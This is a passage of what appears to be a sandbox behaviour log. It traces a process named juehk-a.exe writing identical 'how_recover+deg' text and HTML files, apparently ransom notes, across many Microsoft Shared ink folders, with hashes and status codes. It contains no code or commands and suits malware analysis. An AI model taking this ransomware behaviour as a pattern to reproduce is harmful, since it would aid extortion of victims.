15047.          timestamp: 74618
15048.          mode: created
15049.          sequenceNumber: 1069
15050.          value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.txt
15051.          processinfo:
15052.            pid: 1648
15053.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15054.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15055.            ads:
15056.          fid (ads:): 562949953521120
15057.          ntstatus: 0x0
15058.          CreateOptions: 0x60
15059.        file:
15060.          timestamp: 74624
15061.          mode: close
15062.          sequenceNumber: 1070
15063.          value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.txt
15064.          filesize: 2673
15065.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15066.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15067.          processinfo:
15068.            pid: 1648
15069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15071.            ads:
15072.          fid (ads:): 562949953521120
15073.          ntstatus: 0x0
15074.          CreateOptions: 0x0
15075.        file:
15076.          timestamp: 74631
15077.          mode: created
15078.          sequenceNumber: 1071
15079.          value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.html
15080.          processinfo:
15081.            pid: 1648
15082.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15083.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15084.            ads:
15085.          fid (ads:): 562949953521121
15086.          ntstatus: 0x0
15087.          CreateOptions: 0x60
15088.        file:
15089.          timestamp: 74637
15090.          mode: close
15091.          sequenceNumber: 1072
15092.          value: C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\how_recover+deg.html
15093.          filesize: 9480
15094.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15095.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15096.          processinfo:
15097.            pid: 1648
15098.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15099.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15100.            ads:
15101.          fid (ads:): 562949953521121
15102.          ntstatus: 0x0
15103.          CreateOptions: 0x0
15104.        file:
15105.          timestamp: 74644
15106.          mode: created
15107.          sequenceNumber: 1073
15108.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.txt
15109.          processinfo:
15110.            pid: 1648
15111.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15113.            ads:
15114.          fid (ads:): 562949953521122
15115.          ntstatus: 0x0
15116.          CreateOptions: 0x60
15117.        file:
15118.          timestamp: 74650
15119.          mode: close
15120.          sequenceNumber: 1074
15121.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.txt
15122.          filesize: 2673
15123.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15124.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15125.          processinfo:
15126.            pid: 1648
15127.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15128.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15129.            ads:
15130.          fid (ads:): 562949953521122
15131.          ntstatus: 0x0
15132.          CreateOptions: 0x0
15133.        file:
15134.          timestamp: 74657
15135.          mode: created
15136.          sequenceNumber: 1075
15137.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.html
15138.          processinfo:
15139.            pid: 1648
15140.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15141.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15142.            ads:
15143.          fid (ads:): 562949953521123
15144.          ntstatus: 0x0
15145.          CreateOptions: 0x60
15146.        file:
15147.          timestamp: 74664
15148.          mode: close
15149.          sequenceNumber: 1076
15150.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\how_recover+deg.html
15151.          filesize: 9480
15152.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15153.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15154.          processinfo:
15155.            pid: 1648
15156.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15157.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15158.            ads:
15159.          fid (ads:): 562949953521123
15160.          ntstatus: 0x0
15161.          CreateOptions: 0x0
15162.        file:
15163.          timestamp: 74671
15164.          mode: failed
15165.          sequenceNumber: 1077
15166.          value: C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi
15167.          processinfo:
15168.            pid: 1648
15169.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15170.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15171.            ads:
15172.          fid (ads:): 0
15173.          failure: open
15174.          ntstatus: 0xc0000022
15175.          CreateOptions: 0x60
15176.        file:
15177.          timestamp: 74679
15178.          mode: created
15179.          sequenceNumber: 1078
15180.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.txt
15181.          processinfo:
15182.            pid: 1648
15183.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15184.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15185.            ads:
15186.          fid (ads:): 562949953521124
15187.          ntstatus: 0x0
15188.          CreateOptions: 0x60
15189.        file:
15190.          timestamp: 74684
15191.          mode: close
15192.          sequenceNumber: 1079
15193.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.txt
15194.          filesize: 2673
15195.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15196.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15197.          processinfo:
15198.            pid: 1648
15199.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15200.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15201.            ads:
15202.          fid (ads:): 562949953521124
15203.          ntstatus: 0x0
15204.          CreateOptions: 0x0
15205.        file:
15206.          timestamp: 74705
15207.          mode: created
15208.          sequenceNumber: 1080
15209.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.html
15210.          processinfo:
15211.            pid: 1648
15212.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15213.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15214.            ads:
15215.          fid (ads:): 562949953521125
15216.          ntstatus: 0x0
15217.          CreateOptions: 0x60
15218.        file:
15219.          timestamp: 74711
15220.          mode: close
15221.          sequenceNumber: 1081
15222.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\how_recover+deg.html
15223.          filesize: 9480
15224.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15225.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15226.          processinfo:
15227.            pid: 1648
15228.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15229.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15230.            ads:
15231.          fid (ads:): 562949953521125
15232.          ntstatus: 0x0
15233.          CreateOptions: 0x0
15234.        file:
15235.          timestamp: 74885
15236.          mode: created
15237.          sequenceNumber: 1082
15238.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.txt
15239.          processinfo:
15240.            pid: 1648
15241.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15242.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15243.            ads:
15244.          fid (ads:): 562949953521126
15245.          ntstatus: 0x0
15246.          CreateOptions: 0x60
15247.        file:
15248.          timestamp: 74890
15249.          mode: close
15250.          sequenceNumber: 1083
15251.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.txt
15252.          filesize: 2673
15253.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15254.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15255.          processinfo:
15256.            pid: 1648
15257.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15258.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15259.            ads:
15260.          fid (ads:): 562949953521126
15261.          ntstatus: 0x0
15262.          CreateOptions: 0x0
15263.        file:
15264.          timestamp: 74899
15265.          mode: created
15266.          sequenceNumber: 1084
15267.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.html
15268.          processinfo:
15269.            pid: 1648
15270.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15271.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15272.            ads:
15273.          fid (ads:): 562949953521127
15274.          ntstatus: 0x0
15275.          CreateOptions: 0x60
15276.        file:
15277.          timestamp: 74903
15278.          mode: close
15279.          sequenceNumber: 1085
15280.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\how_recover+deg.html
15281.          filesize: 9480
15282.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15283.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15284.          processinfo:
15285.            pid: 1648
15286.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15287.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15288.            ads:
15289.          fid (ads:): 562949953521127
15290.          ntstatus: 0x0
15291.          CreateOptions: 0x0
15292.        file:
15293.          timestamp: 74911
15294.          mode: created
15295.          sequenceNumber: 1086
15296.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.txt
15297.          processinfo:
15298.            pid: 1648
15299.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15300.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15301.            ads:
15302.          fid (ads:): 562949953521128
15303.          ntstatus: 0x0
15304.          CreateOptions: 0x60
15305.        file:
15306.          timestamp: 74918
15307.          mode: close
15308.          sequenceNumber: 1087
15309.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.txt
15310.          filesize: 2673
15311.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15312.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15313.          processinfo:
15314.            pid: 1648
15315.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15316.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15317.            ads:
15318.          fid (ads:): 562949953521128
15319.          ntstatus: 0x0
15320.          CreateOptions: 0x0
15321.        file:
15322.          timestamp: 74978
15323.          mode: created
15324.          sequenceNumber: 1088
15325.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.html
15326.          processinfo:
15327.            pid: 1648
15328.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15329.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15330.            ads:
15331.          fid (ads:): 562949953521129
15332.          ntstatus: 0x0
15333.          CreateOptions: 0x60
15334.        file:
15335.          timestamp: 74983
15336.          mode: close
15337.          sequenceNumber: 1089
15338.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\how_recover+deg.html
15339.          filesize: 9480
15340.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15341.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15342.          processinfo:
15343.            pid: 1648
15344.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15346.            ads:
15347.          fid (ads:): 562949953521129
15348.          ntstatus: 0x0
15349.          CreateOptions: 0x0
15350.        file:
15351.          timestamp: 75025
15352.          mode: created
15353.          sequenceNumber: 1090
15354.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.txt
15355.          processinfo:
15356.            pid: 1648
15357.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15359.            ads:
15360.          fid (ads:): 562949953521130
15361.          ntstatus: 0x0
15362.          CreateOptions: 0x60
15363.        file:
15364.          timestamp: 75031
15365.          mode: close
15366.          sequenceNumber: 1091
15367.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.txt
15368.          filesize: 2673
15369.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15370.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15371.          processinfo:
15372.            pid: 1648
15373.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15374.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15375.            ads:
15376.          fid (ads:): 562949953521130
15377.          ntstatus: 0x0
15378.          CreateOptions: 0x0
15379.        file:
15380.          timestamp: 75036
15381.          mode: created
15382.          sequenceNumber: 1092
15383.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.html
15384.          processinfo:
15385.            pid: 1648
15386.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15387.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15388.            ads:
15389.          fid (ads:): 562949953521131
15390.          ntstatus: 0x0
15391.          CreateOptions: 0x60
15392.        file:
15393.          timestamp: 75042
15394.          mode: close
15395.          sequenceNumber: 1093
15396.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\how_recover+deg.html
15397.          filesize: 9480
15398.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15399.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15400.          processinfo:
15401.            pid: 1648
15402.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15403.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15404.            ads:
15405.          fid (ads:): 562949953521131
15406.          ntstatus: 0x0
15407.          CreateOptions: 0x0
15408.        file:
15409.          timestamp: 75069
15410.          mode: created
15411.          sequenceNumber: 1094
15412.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.txt
15413.          processinfo:
15414.            pid: 1648
15415.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15416.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15417.            ads:
15418.          fid (ads:): 562949953521132
15419.          ntstatus: 0x0
15420.          CreateOptions: 0x60
15421.        file:
15422.          timestamp: 75074
15423.          mode: close
15424.          sequenceNumber: 1095
15425.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.txt
15426.          filesize: 2673
15427.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15428.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15429.          processinfo:
15430.            pid: 1648
15431.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15432.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15433.            ads:
15434.          fid (ads:): 562949953521132
15435.          ntstatus: 0x0
15436.          CreateOptions: 0x0
15437.        file:
15438.          timestamp: 75085
15439.          mode: created
15440.          sequenceNumber: 1096
15441.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.html
15442.          processinfo:
15443.            pid: 1648
15444.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15445.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15446.            ads:
15447.          fid (ads:): 562949953521133
15448.          ntstatus: 0x0
15449.          CreateOptions: 0x60
15450.        file:
15451.          timestamp: 75090
15452.          mode: close
15453.          sequenceNumber: 1097
15454.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\how_recover+deg.html
15455.          filesize: 9480
15456.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15457.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15458.          processinfo:
15459.            pid: 1648
15460.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15461.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15462.            ads:
15463.          fid (ads:): 562949953521133
15464.          ntstatus: 0x0
15465.          CreateOptions: 0x0
15466.        file:
15467.          timestamp: 75100
15468.          mode: created
15469.          sequenceNumber: 1098
15470.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.txt
15471.          processinfo:
15472.            pid: 1648
15473.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15474.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15475.            ads:
15476.          fid (ads:): 562949953521134
15477.          ntstatus: 0x0
15478.          CreateOptions: 0x60
15479.        file:
15480.          timestamp: 75106
15481.          mode: close
15482.          sequenceNumber: 1099
15483.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.txt
15484.          filesize: 2673
15485.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15486.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15487.          processinfo:
15488.            pid: 1648
15489.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15490.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15491.            ads:
15492.          fid (ads:): 562949953521134
15493.          ntstatus: 0x0
15494.          CreateOptions: 0x0
15495.        file:
15496.          timestamp: 75115
15497.          mode: created
15498.          sequenceNumber: 1100
15499.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.html
15500.          processinfo:
15501.            pid: 1648
15502.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15503.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15504.            ads:
15505.          fid (ads:): 562949953521135
15506.          ntstatus: 0x0
15507.          CreateOptions: 0x60
15508.        file:
15509.          timestamp: 75122
15510.          mode: close
15511.          sequenceNumber: 1101
15512.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\how_recover+deg.html
15513.          filesize: 9480
15514.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15515.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15516.          processinfo:
15517.            pid: 1648
15518.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15519.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15520.            ads:
15521.          fid (ads:): 562949953521135
15522.          ntstatus: 0x0
15523.          CreateOptions: 0x0
15524.        file:
15525.          timestamp: 75131
15526.          mode: created
15527.          sequenceNumber: 1102
15528.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.txt
15529.          processinfo:
15530.            pid: 1648
15531.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15532.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15533.            ads:
15534.          fid (ads:): 844424930231792
15535.          ntstatus: 0x0
15536.          CreateOptions: 0x60
15537.        file:
15538.          timestamp: 75139
15539.          mode: close
15540.          sequenceNumber: 1103
15541.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.txt
15542.          filesize: 2673
15543.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15544.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15545.          processinfo:
15546.            pid: 1648
15547.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15548.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15549.            ads:
15550.          fid (ads:): 844424930231792
15551.          ntstatus: 0x0
15552.          CreateOptions: 0x0
15553.        file:
15554.          timestamp: 75290
15555.          mode: created
15556.          sequenceNumber: 1104
15557.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.html
15558.          processinfo:
15559.            pid: 1648
15560.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15561.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15562.            ads:
15563.          fid (ads:): 562949953521137
15564.          ntstatus: 0x0
15565.          CreateOptions: 0x60
15566.        file:
15567.          timestamp: 75298
15568.          mode: close
15569.          sequenceNumber: 1105
15570.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\how_recover+deg.html
15571.          filesize: 9480
15572.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15573.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15574.          processinfo:
15575.            pid: 1648
15576.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15577.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15578.            ads:
15579.          fid (ads:): 562949953521137
15580.          ntstatus: 0x0
15581.          CreateOptions: 0x0
15582.        file:
15583.          timestamp: 75305
15584.          mode: created
15585.          sequenceNumber: 1106
15586.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.txt
15587.          processinfo:
15588.            pid: 1648
15589.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15591.            ads:
15592.          fid (ads:): 2533274790477568
15593.          ntstatus: 0x0
15594.          CreateOptions: 0x60
15595.        file:
15596.          timestamp: 75311
15597.          mode: close
15598.          sequenceNumber: 1107
15599.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.txt
15600.          filesize: 2673
15601.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15602.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15603.          processinfo:
15604.            pid: 1648
15605.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15606.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15607.            ads:
15608.          fid (ads:): 2533274790477568
15609.          ntstatus: 0x0
15610.          CreateOptions: 0x0
15611.        file:
15612.          timestamp: 75317
15613.          mode: created
15614.          sequenceNumber: 1108
15615.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.html
15616.          processinfo:
15617.            pid: 1648
15618.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15619.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15620.            ads:
15621.          fid (ads:): 562949953521138
15622.          ntstatus: 0x0
15623.          CreateOptions: 0x60
15624.        file:
15625.          timestamp: 75324
15626.          mode: close
15627.          sequenceNumber: 1109
15628.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\how_recover+deg.html
15629.          filesize: 9480
15630.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15631.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15632.          processinfo:
15633.            pid: 1648
15634.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15635.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15636.            ads:
15637.          fid (ads:): 562949953521138
15638.          ntstatus: 0x0
15639.          CreateOptions: 0x0
15640.        file:
15641.          timestamp: 75330
15642.          mode: created
15643.          sequenceNumber: 1110
15644.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.txt
15645.          processinfo:
15646.            pid: 1648
15647.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15648.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15649.            ads:
15650.          fid (ads:): 562949953521139
15651.          ntstatus: 0x0
15652.          CreateOptions: 0x60
15653.        file:
15654.          timestamp: 75338
15655.          mode: close
15656.          sequenceNumber: 1111
15657.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.txt
15658.          filesize: 2673
15659.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15660.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15661.          processinfo:
15662.            pid: 1648
15663.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15664.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15665.            ads:
15666.          fid (ads:): 562949953521139
15667.          ntstatus: 0x0
15668.          CreateOptions: 0x0
15669.        file:
15670.          timestamp: 75408
15671.          mode: created
15672.          sequenceNumber: 1112
15673.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.html
15674.          processinfo:
15675.            pid: 1648
15676.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15677.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15678.            ads:
15679.          fid (ads:): 562949953521140
15680.          ntstatus: 0x0
15681.          CreateOptions: 0x60
15682.        file:
15683.          timestamp: 75414
15684.          mode: close
15685.          sequenceNumber: 1113
15686.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\how_recover+deg.html
15687.          filesize: 9480
15688.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15689.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15690.          processinfo:
15691.            pid: 1648
15692.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15693.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15694.            ads:
15695.          fid (ads:): 562949953521140
15696.          ntstatus: 0x0
15697.          CreateOptions: 0x0
15698.        file:
15699.          timestamp: 75423
15700.          mode: created
15701.          sequenceNumber: 1114
15702.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.txt
15703.          processinfo:
15704.            pid: 1648
15705.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15706.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15707.            ads:
15708.          fid (ads:): 562949953521141
15709.          ntstatus: 0x0
15710.          CreateOptions: 0x60
15711.        file:
15712.          timestamp: 75428
15713.          mode: close
15714.          sequenceNumber: 1115
15715.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.txt
15716.          filesize: 2673
15717.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15718.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15719.          processinfo:
15720.            pid: 1648
15721.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15722.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15723.            ads:
15724.          fid (ads:): 562949953521141
15725.          ntstatus: 0x0
15726.          CreateOptions: 0x0
15727.        file:
15728.          timestamp: 75441
15729.          mode: created
15730.          sequenceNumber: 1116
15731.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.html
15732.          processinfo:
15733.            pid: 1648
15734.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15736.            ads:
15737.          fid (ads:): 562949953521142
15738.          ntstatus: 0x0
15739.          CreateOptions: 0x60
15740.        file:
15741.          timestamp: 75447
15742.          mode: close
15743.          sequenceNumber: 1117
15744.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\how_recover+deg.html
15745.          filesize: 9480
15746.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15747.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15748.          processinfo:
15749.            pid: 1648
15750.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15751.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15752.            ads:
15753.          fid (ads:): 562949953521142
15754.          ntstatus: 0x0
15755.          CreateOptions: 0x0
15756.        file:
15757.          timestamp: 75453
15758.          mode: created
15759.          sequenceNumber: 1118
15760.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.txt
15761.          processinfo:
15762.            pid: 1648
15763.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15764.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15765.            ads:
15766.          fid (ads:): 562949953521143
15767.          ntstatus: 0x0
15768.          CreateOptions: 0x60
15769.        file:
15770.          timestamp: 75457
15771.          mode: close
15772.          sequenceNumber: 1119
15773.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.txt
15774.          filesize: 2673
15775.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15776.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15777.          processinfo:
15778.            pid: 1648
15779.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15780.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15781.            ads:
15782.          fid (ads:): 562949953521143
15783.          ntstatus: 0x0
15784.          CreateOptions: 0x0
15785.        file:
15786.          timestamp: 75471
15787.          mode: created
15788.          sequenceNumber: 1120
15789.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.html
15790.          processinfo:
15791.            pid: 1648
15792.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15794.            ads:
15795.          fid (ads:): 1125899906942456
15796.          ntstatus: 0x0
15797.          CreateOptions: 0x60
15798.        file:
15799.          timestamp: 75489
15800.          mode: close
15801.          sequenceNumber: 1121
